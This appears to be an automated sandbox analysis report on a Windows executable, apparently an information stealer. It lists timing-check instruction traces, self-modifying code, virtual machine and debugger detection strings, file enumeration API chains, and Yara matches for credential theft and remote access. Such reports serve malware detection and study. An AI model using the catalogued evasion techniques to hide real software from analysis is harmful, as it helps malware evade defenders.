Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8A25 second address: AD8A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8A2D second address: AD8A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8577 second address: AD857C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD857C second address: AD85DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FA3D4C68E5Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FA3D4C68E65h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007FA3D4C68E5Ah 0x00000025 jno 00007FA3D4C68E56h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FA3D4C68E5Eh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: ADCA34 second address: ADCA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA3D4D8210Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: ADCA45 second address: ADCA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AE146C second address: AE1472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AEB47B second address: AEB4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FA3D4C68E56h 0x00000012 jmp 00007FA3D4C68E68h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AEF408 second address: AEF412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF446D second address: AF4471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4471 second address: AF4481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D8210Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4481 second address: AF44B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA3D4C68E5Eh 0x00000008 jmp 00007FA3D4C68E5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA3D4C68E5Bh 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4737 second address: AF474C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF474C second address: AF4770 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E6Ah 0x00000008 jne 00007FA3D4C68E56h 0x0000000e jmp 00007FA3D4C68E5Eh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4770 second address: AF4784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA3D4D82106h 0x0000000a js 00007FA3D4D82106h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4784 second address: AF478A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4918 second address: AF491D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF491D second address: AF4923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF94B5 second address: AF94BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF922E second address: AF9232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF9232 second address: AF923A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B0BB9A second address: B0BB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B18EC1 second address: B18ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA3D4D82106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1AA69 second address: B1AA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1AA6D second address: B1AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DEB5 second address: B1DEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DCED second address: B1DCF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DCF1 second address: B1DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DCFF second address: B1DD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3D4D82110h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jc 00007FA3D4D82106h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2BB66 second address: B2BB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a popad 0x0000000b jmp 00007FA3D4C68E5Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2BE1D second address: B2BE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2C1CF second address: B2C1D9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3D4C68E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2C1D9 second address: B2C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA3D4D82108h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3D4D8210Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2C1F6 second address: B2C1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B3077C second address: B30782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30824 second address: B3082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30A16 second address: B30A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 or dh, FFFFFF8Fh 0x0000000b push 00000004h 0x0000000d mov dh, F1h 0x0000000f jl 00007FA3D4D8210Ch 0x00000015 push BE6C793Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FA3D4D8210Ch 0x00000022 jc 00007FA3D4D82106h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30A4C second address: B30A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30CBC second address: B30CCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 519021E second address: 5190247 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA3D4C68E5Ah 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007FA3D4C68E5Bh 0x0000000f mov ch, 77h 0x00000011 pop edi 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, di 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190247 second address: 519027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA3D4D82119h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 mov edi, 5F0F215Ah 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 51902EC second address: 5190322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA3D4C68E5Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190322 second address: 5190331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190331 second address: 5190345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, 0806h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190345 second address: 519034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Special instruction interceptor: First address: 8A199E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Special instruction interceptor: First address: 8A1998 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Special instruction interceptor: First address: AD06B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006538B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00654910
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064DA80
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0064E430
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00654570
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0064ED20
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064BE70
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064DE10
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006416D0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00653EA0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064F6B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00641160 GetSystemInfo,ExitProcess, 0_2_00641160
Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware=
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001434000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001406000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: NTICE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: SICE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: SIWVID
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006445C0 VirtualProtect ?,00000004,00000100,00000000 0_2_006445C0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00659860
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659750 mov eax, dword ptr fs:[00000030h] 0_2_00659750
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00657850
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00659600
Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Program Manager
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00657B90
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00656920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00656920
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00657850
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00657A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00657A30

Stealing of Sensitive Information

Source: Yara match File source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP